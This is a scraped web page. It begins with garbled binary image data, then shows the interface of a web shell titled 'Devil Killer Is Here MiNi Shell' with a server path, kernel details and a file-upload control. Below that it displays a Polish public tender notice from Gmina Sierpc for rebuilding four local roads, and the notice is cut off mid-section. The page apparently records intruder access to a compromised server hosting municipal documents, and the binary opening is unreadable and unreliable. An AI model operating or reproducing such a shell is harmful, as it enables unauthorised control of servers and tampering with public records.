JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210618/0008790101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00087901 z dnia 2021-06-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg gminnych i wewnętrznych na terenie gminy Sierpc” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biskupa Floriana 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 275 23 31</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 275 57 01 w. 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">architektura@gmina.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.sierpc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg gminnych i wewnętrznych na terenie gminy Sierpc” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-751a917d-d018-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00087901</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003795/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa drogi gminnej w m. Rachocin</p> <p class="mb-0">1.1.5 Przebudowa drogi wewnętrznej w m. Studzieniec</p> <p class="mb-0">1.1.6 Przebudowa drogi gminnej w m. Borkowo Kościelne ul. Ogrodowa</p> <p class="mb-0">1.1.7 Przebudowa dróg gminnyhch i wewnętrznych w m. Sułocin-Towarzystwo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugsierpc.bipgmina.pl/wiadomosci/3/lista/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej zostały określone w<br/>pkt. XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/> z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych <br/> oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 <br/> z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1.1. administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy <br/> w Sierpcu jest Wójt Gminy Sierpc, ul. Biskupa Floriana 4, 09-200 Sierpc; <br/><br/><br/>1.2.administrator – Wójt Gminy Sierpc wyznaczył Inspektora Danych Osobowych, z którym <br/> można się kontaktować pod numerem telefonu: (24) 275 57 01, adres e-mail: <br/> iod@gmina.sierpc.pl <br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym str. <br/> 28 w trybie przetargu nieograniczonego na roboty budowlane pn. „Przebudowa dróg <br/> gminnych i wewnętrznych na terenie gminy Sierpc”<br/>1.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp; <br/>1.5.Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 <br/> lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/> umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> 1.6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/> dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, <br/> związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/> konsekwencje niepodania określonych danych wynikają z ustawy pzp;<br/>1.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO. <br/>1.8. posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/> danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora <br/> ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania <br/> postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, <br/> o których mowa w art. 18 ust. 2 RODO; d) prawo do wniesienia skargi do Prezesa Urzędu <br/> Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych <br/> Pani/Pana dotyczących narusza przepisy RODO; <br/>1.9. nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do <br/> usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym <br/> mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec <br/> przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana <br/> danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/> 1.10. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne <br/> z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem <br/> właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, <br/> ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej w miejscowości Borkowo Kościelne ul. Ogrodowa.<br/> W ramach zadania należy wykonać następujące roboty:<br/> - wyznaczenie trasy i punktów wysokościowych wraz z inwentaryzacją powykonawczą;<br/> - zabezpieczenie istniejących kabli telefonicznych z nadzorem pracownika Orange <br/> zgodnie z uzgodnieniem;<br/> - rozebranie nawierzchni z mas mineralno – bitumicznych gr. 2 cm mechanicznie <br/> z wywozem samochodem samowyładowczym i zagospodarowaniem we własnym <br/> zakresie lub na terenie budowy;<br/> - przebrukowanie nawierzchni z kostki (rozebranie zjazdów i dojść z kostki betonowej <br/> wraz z odtworzeniem w tej samej lokalizacji dowiązując się do projektowanej <br/> nawierzchni);<br/> - roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,60 m3 <br/> z zagospodarowaniem urobku sam samowyład. profilowanie istniejącego pasa <br/> drogowego, wykonane równiarką, zdjęcie wierzchniej warstwy gruntu pod nową <br/> nawierzchnię oraz przemieszczenie nadmiaru istniejącej nawierzchni <br/> w nowoprojektowaną jezdnię;<br/> - nasypy wykonywane mechanicznie wraz z formowaniem i zagęszczaniem nasypu <br/> z pozyskaniem brakującej ilości materiału z dowozu;<br/> - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, <br/> wykonywane mechanicznie;<br/><br/> - wykonanie warstwy odsączającej zagęszczane mechanicznie o gr. 5 cm dla odcinka <br/> drogi;<br/> - podbudowa z kruszywa łamanego 0/31,5 gr. po zagęszczeniu 10 cm;<br/> - wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej AC16W50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy podbudowy;<br/> - wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej AC11S50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy wiążącej;<br/> - ścięcie i uzupełnienie pobocza z kruszywa łamanego 0÷31,5 mm, gr. 6 cm po <br/> zagęszczeniu;<br/> - ustawienie słupków z rur stalowych dla znaków drogowych oraz tarcz i tablic znaków <br/> drogowych odblaskowych (wg projektu organizacji ruchu). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej w miejscowości Rachocin.<br/> W ramach zadania należy wykonać następujące roboty:<br/> - wyznaczenie trasy i punktów wysokościowych wraz z inwentaryzacją powykonawczą;<br/> - wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej AC16W50/70, <br/> grubość warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy podbudowy;<br/> - wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej AC11S50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy wiążącej;<br/> - ścięcie i uzupełnienie pobocza z kruszywa łamanego 0÷31,5 mm, gr. 6 cm <br/> po zagęszczeniu;<br/> - ustawienie słupków z rur stalowych dla znaków drogowych oraz tarcz i tablic znaków <br/> drogowych odblaskowych (wg projektu organizacji ruchu). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi wewnętrznej w miejscowości Studzieniec.<br/> W ramach zadania należy wykonać następujące roboty:<br/> - wyznaczenie trasy i punktów wysokościowych wraz z inwentaryzacją powykonawczą;<br/> - zabezpieczenie istniejących kabli telefonicznych i energetycznych z nadzorem <br/> pracownika Orange i Energa zgodnie z uzgodnieniami;<br/> - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, <br/> wykonywane mechanicznie;<br/> - wykonanie warstwy odsączającej zagęszczane mechanicznie o gr. 5 cm dla odcinka <br/> drogi;<br/> - podbudowa z kruszywa łamanego 0/31,5 gr. po zagęszczeniu 10 cm;<br/> - wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej AC16W50/70, <br/> grubość warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy podbudowy;<br/> - wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej AC11S50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy wiążącej;<br/> - ścięcie i uzupełnienie pobocza z kruszywa łamanego 0÷31,5 mm, gr. 6 cm<br/> po zagęszczeniu;<br/> - ustawienie słupków z rur stalowych dla znaków drogowych oraz tarcz i tablic znaków <br/> drogowych odblaskowych (wg projektu organizacji ruchu). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa dróg gminnej i wewnętrznej w miejscowości Sułocin Towarzystwo.<br/> W ramach zadania należy wykonać następujące roboty:<br/> - wyznaczenie trasy i punktów wysokościowych wraz z inwentaryzacją powykonawczą;<br/> - zabezpieczenie istniejących kabli telefonicznych z nadzorem pracownika Orange <br/> zgodnie z uzgodnieniem;<br/> - wykonanie warstwy wiążącej z mieszanki mineralno – asfaltowej AC16W50/70, <br/> grubość warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy podbudowy;<br/> - wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej AC11S50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami <br/> samowyładowczymi z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu <br/> i skropieniu emulsją asfaltową warstwy wiążącej;<br/> - ścięcie i uzupełnienie pobocza z kruszywa łamanego 0÷31,5 mm, gr. 6 cm po <br/> zagęszczeniu;<br/> - ustawienie słupków z rur stalowych dla znaków drogowych oraz tarcz i tablic znaków <br/> drogowych odblaskowych (wg projektu organizacji ruchu). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje 